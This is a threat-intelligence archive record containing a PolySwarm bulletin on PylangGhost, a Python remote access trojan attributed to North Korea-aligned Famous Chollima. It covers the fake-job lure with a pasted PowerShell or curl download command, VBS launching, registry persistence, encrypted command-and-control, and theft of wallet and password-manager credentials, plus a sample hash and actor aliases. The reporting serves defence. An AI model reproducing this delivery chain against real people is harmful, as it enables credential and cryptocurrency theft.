{ "id": "b98be521-7c19-4521-a170-4f3ec100d836", "created_at": "2026-04-06T00:09:11.423607Z", "updated_at": "2026-04-10T03:36:17.205319Z", "deleted_at": null, "sha1_hash": "3915bc15f74d2c9fa1f4ebf96b080f770c7a021a", "title": "Famous Chollima’s PylangGhost", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 2905224, "plain_text": "Famous Chollima’s PylangGhost\r\nBy The Hivemind\r\nArchived: 2026-04-05 17:25:43 UTC\r\nVerticals Targeted: Cryptocurrency\r\nRegions Targeted: India\r\nRelated Families: GolangGhost\r\nExecutive Summary\r\nFamous Chollima, a North Korean-aligned threat actor, has deployed\r\nPylangGhost, a Python-based remote access trojan (RAT), targeting\r\ncryptocurrency and blockchain professionals in India. This malware, a variant of\r\nthe GolangGhost RAT, facilitates credential theft and remote system control via\r\nsophisticated social engineering tactics.\r\nKey Takeaways\r\nPylangGhost, a Python-based RAT, mirrors the functionality of the GolangGhost RAT, targeting Windows\r\nsystems in cryptocurrency and blockchain sectors.\r\nThe malware is delivered through fake job recruitment platforms, leveraging social engineering to trick\r\nvictims into executing malicious scripts.\r\nhttps://blog.polyswarm.io/famous-chollimas-pylangghost\r\nPage 1 of 3\n\nPylangGhost steals credentials from over 80 browser extensions, including cryptocurrency wallets and\r\npassword managers.\r\nWhat is PylangGhost?\r\nIn May 2025, Cisco Talos identified PylangGhost, a Python-based remote access trojan (RAT)\r\ndeployed by the North Korean-aligned threat actor Famous Chollima. This malware targets\r\nWindows systems, while its predecessor, the Golang-based GolangGhost RAT, continues to target\r\nmacOS users. PylangGhost is delivered through a sophisticated social engineering campaign\r\naimed at professionals in the cryptocurrency and blockchain industries, primarily in India. The\r\ncampaign exploits jobseekers by posing as recruiters from reputable companies, such as Coinbase\r\nand Robinhood, to lure victims into executing malicious code. \r\nThe infection chain begins when victims are directed to fake job application websites that instruct them to copy\r\nand execute a command line, typically using PowerShell Invoke-WebRequest or curl. This command downloads a\r\nZIP file containing PylangGhost’s six Python modules, a Visual Basic Script (VBS), and a renamed Python\r\ninterpreter disguised as “nvidia.py.” The VBS unzips a Python library (“lib.zip”) and launches the RAT by\r\nexecuting the interpreter with “nvidia.py” as the main program. This script establishes persistence by creating a\r\nregistry value to ensure the RAT runs at system login, generates a unique system GUID for command-and-control\r\n(C2) communication, and enters a command loop using RC4-encrypted HTTP packets to interact with the C2\r\nserver.\r\nPylangGhost’s functionality is nearly identical to GolangGhost, enabling remote system control, file manipulation,\r\nand credential theft from over 80 browser extensions, including cryptocurrency wallets like MetaMask, Phantom,\r\nand TronLink, as well as password managers such as 1Password and NordPass. The Python modules are well-structured, and their naming conventions and architecture closely resemble those of the Golang variant, suggesting\r\na unified development team. The configuration file “config.py” defines commands identical to those in\r\nGolangGhost, facilitating consistent malicious operations across both variants.\r\nThe campaign’s focus on cryptocurrency and blockchain professionals underscores Famous Chollima’s financial\r\nmotivations, likely aiming to steal sensitive credentials and assets. Open-source intelligence indicates a limited\r\nimpact, with a small number of affected users predominantly in India, suggesting a targeted rather than\r\nwidespread campaign. The use of Python for Windows and Golang for macOS may reflect strategic choices to\r\noptimize platform-specific delivery or evade detection, though the rationale for dual variants remains unclear. The\r\nclose alignment between PylangGhost and GolangGhost highlights Famous Chollima’s evolving tactics.\r\nWho is Famous Chollima?\r\nFamous Chollima, also known as Wagemole, Nickel Tapestry, Purple Bravo, Tenacious Pungsan, Void Dokkaebi,\r\nStorm-1877, and UNC5267 is a North Korea nexus threat actor active since at least 2018. Their activities\r\nprimarily focus on financial gain and espionage to support the DPRK regime. The group is assessed to be\r\naffiliated with North Korea’s Reconnaissance General Bureau, a key intelligence service. \r\nhttps://blog.polyswarm.io/famous-chollimas-pylangghost\r\nPage 2 of 3\n\nFamous Chollima employs sophisticated social engineering, posing as legitimate remote IT workers to infiltrate\r\norganizations. They create fraudulent identities, falsify resumes, and use generative AI to craft convincing\r\nprofiles, securing roles at small to mid-sized businesses via platforms like Upwork and LinkedIn. Once embedded,\r\nthey deploy custom malware, such as BeaverTail and InvisibleFerret, to steal credentials and sensitive data. The\r\ngroup leverages fake job recruitment campaigns, delivering malicious Python-based RATs like PylangGhost to\r\ntarget cryptocurrency and blockchain sectors. They establish persistence through registry modifications and use\r\nRC4-encrypted HTTP for command-and-control communication. \r\nFamous Chollima targets cryptocurrency, blockchain, and technology sectors, with a notable focus on India and\r\nWestern countries, including the US, Germany, and Ukraine. Their operations fund North Korea’s regime through\r\nillicitly earned salaries and stolen assets, evading international sanctions. The group’s infrastructure often relies on\r\nanonymization networks to conceal their activities.\r\nIOCs\r\nPolySwarm has a sample associated with this activity.\r\nc2137cd870de0af6662f56c97d27b86004f47b866ab27190a97bde7518a9ac1b\r\nYou can use the following CLI command to search for all PylangGhost samples in our portal:\r\n$ polyswarm link list -f PylangGhost\r\nDon’t have a PolySwarm account? Go here to sign up for a free Community plan or subscribe.\r\nContact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.\r\nTopics: Blockchain, Threat Bulletin, North Korea, India, Malware, Python, Cryptocurrency, RAT, PylangGhost,\r\nGolangGhost, Famous Chollima\r\nSource: https://blog.polyswarm.io/famous-chollimas-pylangghost\r\nhttps://blog.polyswarm.io/famous-chollimas-pylangghost\r\nPage 3 of 3", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://blog.polyswarm.io/famous-chollimas-pylangghost" ], "report_names": [ "famous-chollimas-pylangghost" ], "threat_actors": [ { "id": "32e2c6f9-a1f5-42bc-ac1d-5d9dc301cf0e", "created_at": "2025-08-07T02:03:25.078429Z", "updated_at": "2026-04-10T02:00:03.811418Z", "deleted_at": null, "main_name": "NICKEL ALLEY", "aliases": [ "CL-STA-0240 ", "Purplebravo Recorded Future", "Storm-1877 ", "Tenacious Pungsan " ], "source_name": "Secureworks:NICKEL ALLEY", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "7187a642-699d-44b2-9c69-498c80bce81f", "created_at": "2025-08-07T02:03:25.105688Z", "updated_at": "2026-04-10T02:00:03.78394Z", "deleted_at": null, "main_name": "NICKEL TAPESTRY", "aliases": [ "CL-STA-0237 ", "CL-STA-0241 ", "DPRK IT Workers", "Famous Chollima ", "Jasper Sleet Microsoft", "Purpledelta Recorded Future", "Storm-0287 ", "UNC5267 ", "Wagemole " ], "source_name": "Secureworks:NICKEL TAPESTRY", "tools": [], "source_id": "Secureworks", "reports": null }, { "id": "4fc99d9b-9b66-4516-b0db-520fbef049ed", "created_at": "2025-10-29T02:00:51.949631Z", "updated_at": "2026-04-10T02:00:05.346203Z", "deleted_at": null, "main_name": "Contagious Interview", "aliases": [ "Contagious Interview", "DeceptiveDevelopment", "Gwisin Gang", "Tenacious Pungsan", "DEV#POPPER", "PurpleBravo", "TAG-121" ], "source_name": "MITRE:Contagious Interview", "tools": [ "InvisibleFerret", "BeaverTail", "XORIndex Loader", "HexEval Loader" ], "source_id": "MITRE", "reports": null }, { "id": "7d5531e2-0ad1-4237-beed-af009035576f", "created_at": "2024-05-01T02:03:07.977868Z", "updated_at": "2026-04-10T02:00:03.817883Z", "deleted_at": null, "main_name": "BRONZE PALACE", "aliases": [ "APT15 ", "BRONZE DAVENPORT ", "BRONZE IDLEWOOD ", "CTG-6119 ", "CTG-6119 ", "CTG-9246 ", "Ke3chang ", "NICKEL ", "Nylon Typhoon ", "Playful Dragon", "Vixen Panda " ], "source_name": "Secureworks:BRONZE PALACE", "tools": [ "BMW", "BS2005", "Enfal", "Mirage", "RoyalCLI", "RoyalDNS" ], "source_id": "Secureworks", "reports": null }, { "id": "d05e8567-9517-4bd8-a952-5e8d66f68923", "created_at": "2024-11-13T13:15:31.114471Z", "updated_at": "2026-04-10T02:00:03.761535Z", "deleted_at": null, "main_name": "WageMole", "aliases": [ "Void Dokkaebi", "WaterPlum", "PurpleBravo", "Famous Chollima", "UNC5267", "Wagemole", "Nickel Tapestry", "Storm-1877" ], "source_name": "MISPGALAXY:WageMole", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "ef59a0d9-c556-4448-8553-ed28f315d352", "created_at": "2025-06-29T02:01:57.047978Z", "updated_at": "2026-04-10T02:00:04.744218Z", "deleted_at": null, "main_name": "Operation Contagious Interview", "aliases": [ "Jasper Sleet", "Nickel Tapestry", "Operation Contagious Interview", "PurpleBravo", "Storm-0287", "Tenacious Pungsan", "UNC5267", "Wagemole", "WaterPlum" ], "source_name": "ETDA:Operation Contagious Interview", "tools": [ "BeaverTail", "InvisibleFerret", "OtterCookie", "PylangGhost" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434151, "ts_updated_at": 1775792177, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/3915bc15f74d2c9fa1f4ebf96b080f770c7a021a.pdf", "text": "https://archive.orkl.eu/3915bc15f74d2c9fa1f4ebf96b080f770c7a021a.txt", "img": "https://archive.orkl.eu/3915bc15f74d2c9fa1f4ebf96b080f770c7a021a.jpg" } }